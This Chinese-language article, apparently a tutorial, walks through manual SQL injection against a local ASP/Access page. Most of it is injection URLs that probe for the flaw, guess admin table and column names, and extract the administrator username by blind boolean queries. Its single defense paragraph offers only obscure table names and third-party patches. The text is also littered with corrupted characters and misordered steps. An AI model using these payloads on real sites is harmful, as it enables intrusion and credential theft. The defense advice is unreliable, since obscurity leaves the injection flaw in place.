很多情況下����,入侵者在使用工具注入時發現工具才解不出來表名和字段名,那是因為所有的工具都有自己的一部字典���,這部字典內包括了表名和字段名��,如果管理員把表名和字段名改成了不在這部字典內�����,那么我們使用的工具將無法猜解出字段名和表名��。在以下的文章中,將從分析手工注入出發��,來打造抵御SQL注入的防線���。
入侵者將會構造簡單的判斷條件��,來判斷該頁面是否存在注入漏洞����,一般步驟如下:
這里要檢測的頁面為http://127.0.0.1/111/view.asp?id=198
1.入侵者要想對站點進行手工注入就必須對瀏覽器進行設置,以保證手工注入時能返回出錯信息��,其操作步驟如下:
右鍵點擊瀏覽器選擇“屬性”�,在彈出來的對話框中選擇“高級”選項卡���。如下圖所示:
圖一
接著去掉“顯示友好的HTTP錯誤信息”前面的鉤�����,最后點擊“應用”按鈕即可。
2.入侵者向瀏覽器提交如下url:
http://127.0.0.1/111/view.asp?id=198 and 1=1
如果存在SQL注入漏洞�����,就可以查詢數據庫���,1=1是一個恒等式可以忽略��,因此會返回一個正常的頁面���,此頁面和http://127.0.0.1/111/view.asp?id=198一樣���,這時入侵者便判斷此站有希望被注入。如果返回的是一些錯誤信息��,那么一些初級的入侵者可能就會放棄這個站點���。
3.入侵者進一步向瀏覽器提交如下url:
http://127.0.0.1/111/view.asp?id=198 and 1=2
1=2為一個恒不等式,如果該站點支持數據庫查詢,則大概會返回如下圖所示的信息:
圖二
一般出現上圖所示入侵者就基本確定此站能夠進行SQL注入攻擊了���。
不過很多時候入侵者只需用一個單引號即可快速判斷出目標站點是否存在SQL注入漏洞�����,向瀏覽器提交如下url:
http://127.0.0.1/111/view.asp?id=198’如果返回如下信息則說明有一半機會以上存在注入漏洞:
Microsoft OLE DB PRovider for ODBC Drivers 錯誤’80040e14’
[Microsoft] [ODBC Microsoft access Driver]字符串的語法錯誤在查詢表達式’id =1’’中。/list.asp,行50
4.此時入侵者開始構造特殊的SQL查詢語句開始查詢站點數據庫的表名���,向url提交如下語句:
http://127.0.0.1/111/view.asp?id=198 and exists(select * from admin)
這個語句是向數據庫查詢是否存在admin這個表�,如果存在則返回正常頁面�,如果不存在此表則返回出錯頁面���。一般入侵者會先測試常用的表名���,也是一般的注入工具密碼字典內存在的表名和字段名。如果表名不在常用表名中則入侵者就會結合社會工程學來猜解表名���,這種情況下入侵者猜中表名的幾率較低。
5.入侵者在得到表名后開始構造查詢語句查詢數據庫字段名�����,向url提交如下語句:
http://127.0.0.1/111/view.asp?id=198 and exists(select user from admin)
這個語句是向數據庫中admin表中查詢是否存在user字段�,如果存在則返回正常頁面�����,如果不存在則返回出錯頁面�。
7.接下來入侵者開始確定字段id的值�,構造如下語句可以查詢id的值:http://127.0.0.1/111/view.asp?id=198 and exists (select id from admin where id=1)
正確則返回正確頁面����,錯誤則返回出錯頁面。
6.表名和字段名猜測出來以后���,入侵者開始構造查詢語句猜測管理員帳號長度���,向url提交如下語句:
http://127.0.0.1/111/view.asp?id=198 and exists(select id from admin where len(user)<6 and id=1)
此語句為查詢user字段中用戶名長度范圍���,表示長度小于6,正確則返回正常頁面����,錯誤則返回出錯頁面。
縮小范圍��,然后構造如下語句確定用戶名具體長度:
http://127.0.0.1/111/view.asp?id=198 and exists(select id from admin where len(user)=5 and id=1)
正確則返回正常頁面�����,錯誤則返回出錯頁面�。
8.接下來入侵者開始進入最后的環節構造語句查詢管理員用戶名,向url提交如下語句:http://127.0.0.1/111/view.asp?id=198 and exists(select count(*) from admin where left(user,1)='a')
此語句是從用戶名左邊開始猜測用戶名地一位為a����,正確則返回正常頁面��,錯誤則返回出錯頁面����,一位一位猜,猜第2位時���,修改語句為(user,2)='ad',后面類推��。
在入侵者得到用戶名密碼以后���,此次注入就接近尾聲了���。
至于防范方法很簡單�����,從上面的過程可以看出如果表名和字段名不在常用表名和字段名中則入侵者是使用社會工程學來猜解��,如果管理員修改的表名和字段名足夠復雜則入侵者依然不能達到目的,還有一種簡單的防御方法就是到網上去下載一些防注入補丁程序打上就可以了����,這種方法是修改站點文件,增加過濾語句來過濾入侵者提交的語句來達到防注入的��,這里就不再給大家講解其原理了。
